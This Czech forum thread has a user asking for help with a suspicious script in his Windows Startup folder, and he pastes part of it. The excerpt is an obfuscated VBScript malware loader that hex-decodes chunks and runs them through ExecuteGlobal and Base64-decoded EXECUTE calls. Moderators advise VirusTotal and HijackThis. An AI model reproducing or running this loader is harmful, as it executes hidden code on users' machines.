podezřelý scriptový soubor v složce Po Spuštění

Sekce věnovaná virům a jiným škodlivým kódům, rovněž ale nástrojům, kterým se lze proti nim bránit…

Moderátoři: Mods_senior, Security team

Pravidla fóra
Návod na použití programu HijackThis || Návod na vyčištění počítače CCleanerem || FAQ: Antiviry
Zamčeno
Uživatelský avatar
filantan5544
Level 2
Level 2
Příspěvky: 189
Registrován: 11 kvě 2013 13:10
Bydliště: Tlučná

podezřelý scriptový soubor v složce Po Spuštění

Příspěvek od filantan5544 »

dobrý den chtel jsem dát program core temp do složky po spustění a objevil jsem tam script s tímto kodem "
off = off & php("4A617665536372697074203D2022333958587065707369585836305858706570736958583931585870657073695858333258587065707369585831313458587065707369585831303158587065707369")
off = off & php("5858393958587065707369585831313158587065707369585831303058587065707369585831303158587065707369585831313458587065707369585833325858706570736958583538585870657073695858333258587065707369585831303458587065707369585831313158587065707369585831313758587065707369")
off = off & php("5858313030585870657073695858313035585870657073695858313130585870657073695858313035585870657073695858333258587065707369585834305858706570736958583939585870657073695858343158587065707369585833325858706570736958583131355858706570736958583130375858706570736958")
off = off & php("5831323158587065707369585831313258587065707369585831303158587065707369585833325858706570736958583538585870657073695858333258587065707369585831303458587065707369585831313158587065707369585831313758587065707369585831303058587065707369585831303558587065707369")
off = off & php("5858313130585870657073695858313035585870657073695858343558587065707369585831303258587065707369585831323058587065707369585833325858706570736958583933585870657073695858363258587065707369585831335858706570736958583130585870657073695858313358587065707369585831")
off = off & php("617461203D20300D0A456C73650D0A7468697344617461203D20496E53747228312C204261736536342C2074686973436861722C20766242696E617279436F6D7061726529202D20310D0A456E642049660D0A4966207468697344617461203D202D31205468656E0D0A4572722E526169736520322C20224261736536344465")
off = off & php("636F6465222C20224261642063686172616374657220496E2042617365363420737472696E672E220D0A457869742046756E6374696F6E0D0A456E642049660D0A6E47726F7570203D203634202A206E47726F7570202B2074686973446174610D0A4E6578740D0A6E47726F7570203D20486578286E47726F7570290D0A6E47")
off = off & php("726F7570203D20537472696E672836202D204C656E286E47726F7570292C20223022292026206E47726F75700D0A704F7574203D2043687228434279746528222648222026204D6964286E47726F75702C20312C2032292929202B205F0D0A43687228434279746528222648222026204D6964286E47726F75702C20332C2032")
off = off & php("292929202B205F0D0A43687228434279746528222648222026204D6964286E47726F75702C20352C20322929290D0A734F7574203D20734F75742026204C65667428704F75742C206E756D446174614279746573290D0A4E6578740D0A4261736536344465636F6465203D20734F75740D0A456E642046756E6374696F6E0D0A")
off = off & php("44696D2044414441445257574553415344440D0A4441444144525757455341534444203D2022585870657073695858220D0A44696D204441444144525757455341534444310D0A444144414452575745534153444431203D2044414441445257574553415344440D0A44696D204441444144525757455341534444320D0A4441")
off = off & php("44414452575745534153444432203D204441444144525757455341534444310D0A44696D204441444144525757455341534444330D0A444144414452575745534153444433203D204441444144525757455341534444320D0A44696D204441444144525757455341534444340D0A444144414452575745534153444434203D20")
off = off & php("4441444144525757455341534444330D0A44696D204441444144525757455341534444350D0A444144414452575745534153444435203D204441444144525757455341534444340D0A44696D204441444144525757455341534444360D0A444144414452575745534153444436203D204441444144525757455341534444350D")
off = off & php("0A44696D204441444144525757455341534444370D0A444144414452575745534153444437203D204441444144525757455341534444360D0A466F7220454545203D203020544F2035300D0A4946204A617665536372697074203D202222205468656E0D0A6D7367626F7828223030646422290D0A44696D204545450D0A696E")
off = off & php("707574626F78282273646653444622290D0A456C73654966204A617665536372697074203D2022506550736922205468656E0D0A696E7075626F78282273646622290D0A456C73654966204A617665536372697074203D20226664676822205468656E0D0A6D7367626F782822686A22290D0A456C73654966204A6176655363")
off = off & php("72697074203D202271717722205468656E0D0A6D7367626F78282272657222290D0A456E642049660D0A4E4558540D0A4A617665536372697074203D2053504C4954284A6176655363726970742C444144414452575745534153444437290D0A46756E6374696F6E2053686F7753756D2876616C7565312C2076616C75653229")
off = off & php("0D0A44696D2073756D0D0A272044657465726D696E6520616E6420646973706C6179207468652073756D2E0D0A73756D203D2076616C756531202B2076616C7565320D0A4D7367426F7820225468652073756D2069733A20202220262073756D0D0A2720536574207468652066756E6374696F6E27732072657475726E207661")
off = off & php("6C75652E0D0A53686F7753756D203D2073756D0D0A456E642046756E6374696F6E0D0A46756E6374696F6E2052656528566172290D0A526565203D20426173653634456E636F646528566172290D0A456E642046756E6374696F6E0D0A46756E6374696F6E20426173653634456E636F646528696E44617461290D0A436F6E73")
off = off & php("7420426173653634203D20224142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A303132333435363738392B2F220D0A44696D20634F75742C20734F75742C20490D0A466F722049203D203120546F204C656E28696E4461746129205374657020")
off = off & php("330D0A44696D206E47726F75702C20704F75742C207347726F75700D0A6E47726F7570203D2026483130303030202A20417363284D696428696E446174612C20492C20312929202B205F0D0A2648313030202A204D79415343284D696428696E446174612C2049202B20312C20312929202B204D79415343284D696428696E44")
off = off & php("6174612C2049202B20322C203129290D0A6E47726F7570203D204F6374286E47726F7570290D0A6E47726F7570203D20537472696E672838202D204C656E286E47726F7570292C20223022292026206E47726F75700D0A704F7574203D204D6964284261736536342C20434C6E672822266F222026204D6964286E47726F7570")
off = off & php("2C20312C20322929202B20312C203129202B205F0D0A4D6964284261736536342C20434C6E672822266F222026204D6964286E47726F75702C20332C20322929202B20312C203129202B205F0D0A4D6964284261736536342C20434C6E672822266F222026204D6964286E47726F75702C20352C20322929202B20312C203129")
off = off & php("202B205F0D0A4D6964284261736536342C20434C6E672822266F222026204D6964286E47726F75702C20372C20322929202B20312C2031290D0A734F7574203D20734F7574202B20704F75740D0A4E6578740D0A53656C6563742043617365204C656E28696E4461746129204D6F6420330D0A4361736520313A202738206269")
off = off & php("742066696E616C0D0A734F7574203D204C65667428734F75742C204C656E28734F757429202D203229202B20223D3D220D0A4361736520323A20273136206269742066696E616C0D0A734F7574203D204C65667428734F75742C204C656E28734F757429202D203129202B20223D220D0A456E642053656C6563740D0A426173")
off = off & php("653634456E636F6465203D20734F75740D0A456E642046756E6374696F6E0D0A46756E6374696F6E204D79415343284F6E6543686172290D0A4966204F6E6543686172203D202222205468656E204D79415343203D203020456C7365204D79415343203D20417363284F6E6543686172290D0A456E642046756E6374696F6E0D")
off = off & php("0A464F522058203D203020544F2055424F554E44284A61766553637269707429202D310D0A436F6465646520203D205265652843687257284A61766553637269707428582929290D0A5065507369203D2050655073692026204261736536344465636F6465285265652843687257284A6176655363726970742858292929290D")
off = off & php("0A4E4558540D0A5065507369203D20426173653634456E636F6465285065507369290D0A4558454355544520284261736536344465636F64652850655073692929")
ExecuteGlobal off
Function php(off) : For y = 1 To Len(off) Step 2 : ub = ub & Chr(Clng("&H" & Mid(off, y, 2))) : Next : php = ub : End Function
" a takto bych mohl pokračovat do aleluja je tam přes 381300 znaků nevíte co to je
:::::::::.....Mojí Gramatiku Nekomentovat Vím Že dělám chybi ale není to moje vina je to tím že jsem disgrafik :D.....:::::::::
Nahoru
Uživatelský avatar
filantan5544
Level 2
Level 2
Příspěvky: 189
Registrován: 11 kvě 2013 13:10
Bydliště: Tlučná

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvek od filantan5544 »

jo a jeste je tam soubor 301b5fcf8ce2fab8868e80b6c1f912fe.exe asi to patří k tomu .
:::::::::.....Mojí Gramatiku Nekomentovat Vím Že dělám chybi ale není to moje vina je to tím že jsem disgrafik :D.....:::::::::
Nahoru
Oxxid
člen BSOD týmu
Příspěvky: 6194
Registrován: 07 pro 2012 19:16

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvek od Oxxid »

Ten exac nahrej na virustotal.com a postni sem link.
Nahoru
Uživatelský avatar
filantan5544
Level 2
Level 2
Příspěvky: 189
Registrován: 11 kvě 2013 13:10
Bydliště: Tlučná

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvek od filantan5544 »

https://www.virustotal.com/cs/file/903a ... /analysis/ napsalo mi to že tento soubor tam již byl analizován přede 4 týdny takže má asi stejný zdroják ale jiný název :) ale je to ono:D a jak se tak na to koukam tak to pošlu k analíze do AVIRI protože tenhle virus ještě ve své databázy nemají :D
:::::::::.....Mojí Gramatiku Nekomentovat Vím Že dělám chybi ale není to moje vina je to tím že jsem disgrafik :D.....:::::::::
Nahoru
Uživatelský avatar
jerabina
člen Security týmu
Příspěvky: 3647
Registrován: 16 bře 2013 15:08
Bydliště: Litoměřice

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvek od jerabina »

Doporučil bych ti udělat si log z programu HJT a přiít k nám do sekce HiJackThis, nejspíše tam toho bude více.
Když nevíš jak dál, přichází na řadu prostudovat manuál!
HJT návod

Pokud neodpovídám do vašich témat v sekci HJT když jsem online, tak je to jen proto, že jsem na mobilu kde je studování logů a psaní skriptů nemožné. Neberte to tedy prosím jako ignoraci.
Nahoru
Uživatelský avatar
filantan5544
Level 2
Level 2
Příspěvky: 189
Registrován: 11 kvě 2013 13:10
Bydliště: Tlučná

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvek od filantan5544 »

?????? jak to mám udělat :)
:::::::::.....Mojí Gramatiku Nekomentovat Vím Že dělám chybi ale není to moje vina je to tím že jsem disgrafik :D.....:::::::::
Nahoru
Uživatelský avatar
Orcus
člen Security týmu
Příspěvky: 10645
Registrován: 19 dub 2010 14:48
Bydliště: Okolo rostou 3 růže =o)

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvek od Orcus »

Návod u mě či jerabiny v podpisu. ;)
Láska hřeje, ale uhlí je uhlí. :fire:
Log z HJT vkládejte do HJT sekce. Je-li moc dlouhý, rozděl jej do více zpráv.

Pár rad k bezpečnosti PC.

Po dobu mé nepřítomnosti mě zastupuje memphisto, jaro3 a Diallix

Pokud budete spokojeni , můžete podpořit naše fórum.
Nahoru
Uživatelský avatar
filantan5544
Level 2
Level 2
Příspěvky: 189
Registrován: 11 kvě 2013 13:10
Bydliště: Tlučná

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvek od filantan5544 »

házelo mi to modrou smrt a když jsem to chtel odstranit tak se tam objevyli znova a dávalo mi to i do telefonu najednou mi avira v telefonu ukazala 78viru tak jsem řekl a dost a přeinstaloval jsem system a už je to v poho ale sere me že sem musel zformatovat jak telefon tak počítač protože ty viri se navazovali na normalni soubory :(
:::::::::.....Mojí Gramatiku Nekomentovat Vím Že dělám chybi ale není to moje vina je to tím že jsem disgrafik :D.....:::::::::
Nahoru
Uživatelský avatar
Pic
Guru Level 13
Guru Level 13
Příspěvky: 23292
Registrován: 05 zář 2006 13:13
Bydliště: Východní Čechy

Re: podezřelý scriptový soubor v složce Po Spuštění

Příspěvek od Pic »

Takže pokud je problém vyřešen, klikni na zelené zatržítko.
Přečti si pravidla tohoto fóra! Přečetl jsi si nejprve manuál? Piš tak, abychom Ti rozuměli! Na SZ neodpovídám na požadavky řešení Vašich problémů s PC!
Nic není dokonalé, ani člověk!
Nahoru
Zamčeno

Zpět na „Viry, antiviry, firewally…“